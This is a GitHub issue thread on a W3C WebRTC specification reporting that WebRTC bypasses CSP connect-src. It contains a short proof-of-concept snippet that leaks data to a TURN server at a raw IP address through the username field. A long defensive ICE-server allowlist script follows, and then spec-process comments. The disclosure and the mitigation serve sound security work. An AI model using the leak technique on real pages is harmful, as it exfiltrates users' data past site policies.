WebRTC bypass CSP connect-src policies #35

Closed
murillo128 opened this issue Jan 9, 2018 · 4 comments

murillo128 commented Jan 9, 2018

As explained here: w3c/webappsec-csp#92, WebRTC bypasses the CSP security policies for connect-src, and a malicious script could use WebRTC to leak data to a rogue server.

Note that it is not even necessary to use data channels at all, as you could leak data (at a low rate) to a specially crafted TURN server via the username:

var pc = new RTCPeerConnection({"iceServers":[{"urls":["turn:74.125.140.127:19305?transport=udp"],"username":"_all_your_data_belongs_to_us","credential":"."}]});
// setLocalDescription starts ICE gathering, which contacts the configured TURN server
pc.createOffer().then((sdp)=>pc.setLocalDescription(sdp));

IMHO this should be covered in the CSP spec, but we should add a warning in the security and privacy section of the WebRTC spec until this is solved.
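A page-side mitigation for the gap described above, added here as an example that is not from the issue or from any WebRTC or CSP specification: it wraps the browser's RTCPeerConnection constructor so that every ICE server must be on a host allowlist, rejecting configurations such as the TURN URI quoted in the comment. The allowlist hostnames (turn.example.org, stun.example.org), the regex-based URI parser and the installIceGuard/vetIceServers names are assumptions of this example.

```javascript
// Added example (not from the issue or the WebRTC spec): allowlist ICE servers,
// because CSP connect-src does not cover STUN/TURN traffic. Hostnames are constructed.
const ALLOWED_ICE_HOSTS = new Set(["turn.example.org", "stun.example.org"]);

// Parse a STUN/TURN URI of the form scheme:host[:port][?transport=udp|tcp]
// (the shape used by RFC 7064/7065) and return its lowercase host, or null.
function iceHost(uri) {
  const m = /^(stuns?|turns?):(\[[^\]]+\]|[^:?\/]+)(?::(\d+))?(?:\?transport=(udp|tcp))?$/i
    .exec(String(uri).trim());
  return m ? m[2].toLowerCase() : null;
}

// Split an RTCConfiguration's iceServers into allowed and rejected entries.
// An entry passes only if every one of its URLs parses and hits the allowlist.
function vetIceServers(config, allowed = ALLOWED_ICE_HOSTS) {
  const ok = [], rejected = [];
  for (const server of (config && config.iceServers) || []) {
    const urls = Array.isArray(server.urls) ? server.urls : [server.urls];
    const bad = urls.filter((u) => {
      const host = iceHost(u);
      return host === null || !allowed.has(host);
    });
    (bad.length ? rejected : ok).push(server);
  }
  return { ok, rejected };
}

// Replace the constructor on `global` with a guarded one that fails closed and
// reports rejected servers (the hook is where a defender would log or beacon).
// Returns true if the guard was installed, false if absent or already installed.
function installIceGuard(global = globalThis, report = console.warn) {
  const Native = global.RTCPeerConnection;
  if (typeof Native !== "function" || Native.__iceGuarded) return false;
  function Guarded(config, ...rest) {
    const { rejected } = vetIceServers(config);
    if (rejected.length) {
      report("RTCPeerConnection: blocked non-allowlisted ICE servers", rejected);
      throw new Error("ICE server not permitted by page policy");
    }
    return new Native(config, ...rest);
  }
  Guarded.prototype = Native.prototype;
  Object.setPrototypeOf(Guarded, Native);
  Guarded.__iceGuarded = true;
  global.RTCPeerConnection = Guarded;
  return true;
}
```

Call installIceGuard() before any third-party script runs; it is a defence in depth for the page's own origin, not a substitute for a browser-enforced policy.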

@alvestrand (Contributor)

Pull request on CSP spec: w3c/webappsec-csp#287

@alvestrand alvestrand self-assigned this Jan 18, 2018

henbos commented Aug 22, 2018

What's the status here?

@alvestrand (Contributor)

Since this is a new feature, and we've stopped adding new features, I'm moving this to the NV repo.

@alvestrand alvestrand transferred this issue from w3c/webrtc-pc Jul 4, 2019
aboba added a commit that referenced this issue Jul 15, 2019
Fix for Issues #35 and #36.
aboba (Collaborator) commented Aug 27, 2019

With merger of PR 38, closing this issue.

@aboba aboba closed this as completed Aug 27, 2019